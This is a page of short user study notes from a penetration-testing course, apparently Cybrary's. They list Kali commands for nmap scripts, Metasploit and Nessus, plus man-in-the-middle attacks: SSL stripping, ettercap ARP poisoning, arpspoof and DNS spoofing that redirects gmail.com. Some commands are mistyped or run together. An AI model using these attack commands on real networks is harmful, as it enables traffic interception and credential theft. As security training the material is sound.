Advanced Penetration Testing Notes

Comando Linux

pwd: saber qual pasta está man+” comando” : informaçõ sobre  o comanado adduser+nome: adiciona novo usuario   [view]

By: wellington carlos barbosa | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: September 17, 2017

Different Language

Bash : Genius Mind C : Extraordinary Mind Python : Brilliant Mind Me : NEVER MIND ;)    [view]

By: Bobo2017 | Related Lesson: Programming (part 5) Python Import Command | Modified: September 17, 2017

Anotation

Metasploit service postgresql start service metasploit start msconsole     [view]

By: aguinaldo | Related Lesson: Metasploit (part 3) Operation | Modified: September 16, 2017

proc

cd /usr/share/nmap/scripts ls -a nmap –script-help nmap –script-help smb-vuln-conficker nmap -sC -oA scriptoutput [view]

By: atif | Related Lesson: Vulnerability Scanning (part 3) Nmap Scripting Engine | Modified: September 16, 2017

ssl striping

/proc/sys/net/ipv4/ip_forward    should be 1 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 sslstript -l 8080   [view]

By: 574r570rm | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: September 15, 2017

ettercap MITM

ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.119// nano /etc/ettercap/etter.conf id are 0 linux>iptables: redir should be uncomment [view]

By: 574r570rm | Related Lesson: Traffic Capture (part 5) ettercap | Modified: September 15, 2017

nmap scripting

/usr/share/nmap/scripts   nmap –script-help nmap -sC <ipaddress> -oA  nmap –script=nfs-ls <ipaddress> [view]

By: Dhruv Majumdar | Related Lesson: Vulnerability Scanning (part 3) Nmap Scripting Engine | Modified: September 13, 2017

Vul. Scanner

service nessusd start https://127.0.0.1:8834   [view]

By: Dhruv Majumdar | Related Lesson: Vulnerability Scanning (part 2) Nessus | Modified: September 12, 2017

dns spoofing

arpspoof -i eth0 <target> <whatweare> arpspoof -i eth0 <targetdest> <wearetarget> echo ”127.0.0.1 www.gmail.com” > hosts.txt service apache2 start dnsspoof -i eth0 -f /root/hosts.txt   [view]

By: 574r570rm | Related Lesson: Traffic Capture (part 4) DNS | Modified: September 12, 2017

arpspoof

arpspoof -i eth0 -t 192.168.1.76 192.168.1.80cat /proc/sys/net/ipv4/ip_forwardecho 1 > /proc/sys/net/ipv4/ip_forwardarp -a [view]

By: 574r570rm | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: September 12, 2017

« First ‹ Previous 1 79 87 88 89 90 91 99 189 243 Next › Last »

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel